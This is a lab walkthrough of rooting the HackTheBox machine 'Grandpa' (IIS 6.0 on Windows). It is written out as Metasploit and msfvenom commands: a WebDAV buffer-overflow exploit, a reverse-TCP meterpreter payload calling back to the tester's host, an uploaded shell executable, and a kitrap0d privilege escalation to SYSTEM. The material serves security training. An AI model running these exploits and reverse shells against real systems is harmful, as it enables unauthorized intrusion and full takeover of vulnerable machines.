Grandpa HackTheBox WalkThrough
This is Grandpa HackTheBox machine walkthrough and is the
9th machine of our
OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to
Grandpa HTB machine. Before starting let us know something about this machine. It is a
windows OS box with IP address
10.10.10.14 and difficulty
easy assigned by its maker.
This machine is currently
retired so you will require
VIP subscription at
hackthebox.eu to access this machine. First of all, connect your PC with htb VPN and make sure your connectivity with grandpa machine by pinging the IP 10.10.10.14. If all goes correct then start hacking. As usual I started by scanning the machine. Used
Nmap [a port scanner] for this task and the result is below-
$sudo nmap -sC -sV -p- -oN full_scan.nmap 10.10.10.14
Nmap revealed that only port
80 is open and
IIS web server is running with version
6.0 which is a lot outdated version. Current version of IIS is
10.0. So there are more chances of available exploits. Looking the version in
searchsploit (an exploit-db querying tool) listed many number of potential exploits. Among these exploits, the most trusted one is
Remote Buffer Overflow because this exploit can give us
remote shell very easily.
Searching Available exploit
$searchsploit IIS 6.0
When I searched this exploit in
metasploit then found it with the module named
exploit/windows/iis/iis_webdav_scstoragepathfromurl. Using this module I got user shell very easily without much effort. For more info about this exploit check this link.
Note: This is buffer overflow exploit. So when the machine is exploited using this exploit, the machine is needed to be reset soon if other user try to run this exploit again. So if you want to get shell again you have to reset the machine. This is because this exploit might kill the vulnerable process.
Getting User Shell
msf5 > search ScStoragePathFromUrl
msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.10
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.14
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
meterpreter > sysinfo
You can see we have easily got a user shell. When tried to grab
user flag it gave me
access denied. Maybe it needs some high level privilege to give access to user.txt file. So I tried to escalate the privilege to admin then.
To escalate the privilege to administrator we have to first find a
privilege escalation vector using which we can escalate the privilege. Since we are inside the meterpreter shell so I used
multi/recon/local_exploit_suggester (a post exploitation module to search for possible available kernel exploits).
multi/recon/local_exploit_suggester module search for Kernel exploit whose patch is not installed in victim machine.
Finding PrivEsc Vector
meterpreter > run multi/recon/local_exploit_suggester
Local Exploit Suggeter listed
6 exploits that can be used to get admin shell. Tried each of them one by one and every exploit failed to execute by giving me access denied error. When I tried to upgrade the shell using
shell command of meterpreter,
shell died very soon. This may be because we don’t have a fully upgraded meterpreter shell.
I think this was the reason we could not capture user flag and got permission denied. To solve this problem I created a new meterpreter shell with this existing meterpreter shell. When I got new meterpreter shell I tried to run all the Kernel exploits again which were listed by
local_exploit_suggester. After running the exploits again
found two exploits that could easily gave me administrator shell. So here our PrivEsc vector is
To create a new meterpreter shell I did the following things.
1. Created a msfvenom payload
2. Changed the directory to
C:\Windows\Temp (a public writeable directory) in Grandpa box.
3. Uploaded shell.exe to Temp folder using
upload command of the meterpreter.
listener in msfconsole
5. Executed shell.exe payload using
execute meterpreter command.
$msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=4321 -f exe > shell.exe
Here I have used a 32-bit payload because Grandpa machine has 32-bit architecture.
Uploading & Executing
meterpreter > cd "C:\Windows\Temp"
meterpreter > upload /home/deepak/HTB/Boxes/Grandpa/shell.exe
meterpreter > execute -f shell.exe
Getting Upgraded User Shell
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LPORT 4321
msf5 exploit(multi/handler) > set LHOST 10.10.14.10
msf5 exploit(multi/handler) > exploit
So we have upgraded our meterpreter shell to fully functional meterpreter shell. Let us escalate the privilege to System.
exploit/windows/local/ms10_015_kitrap0d were two modules that gave me admin shell.
Getting Root Shell
meterpreter > background
msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.10
msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit
meterpreter > getuid
NT AUTHORITY\SYSTEM now, which is the highest privilege in windows OS. Let us capture user and root flags. Since our cmd shell get died very fast so we can use
search command to search for the flags while we are in meterpreter shell.
Capture User Flag
meterpreter > search -f user.txt C:\\
meterpreter > cat "c:\Documents and Settings\Harry\Desktop\user.txt"
Capture Root Flag
meterpreter > search -f root.txt C:\\
meterpreter > cat "c:\Documents and Settings\Administrator\Desktop\root.txt"
This was how I rooted Grandpa HackTheBox machine. Learnt a lot after hunting this box. Hope you guys have also learnt some new things from this box. Thanks for reading this writeup. Write your experience in the comment section. For any suggestion and query related to walkthrough feel free to write us at [email protected].
Next retired machine walkthrough is Granny.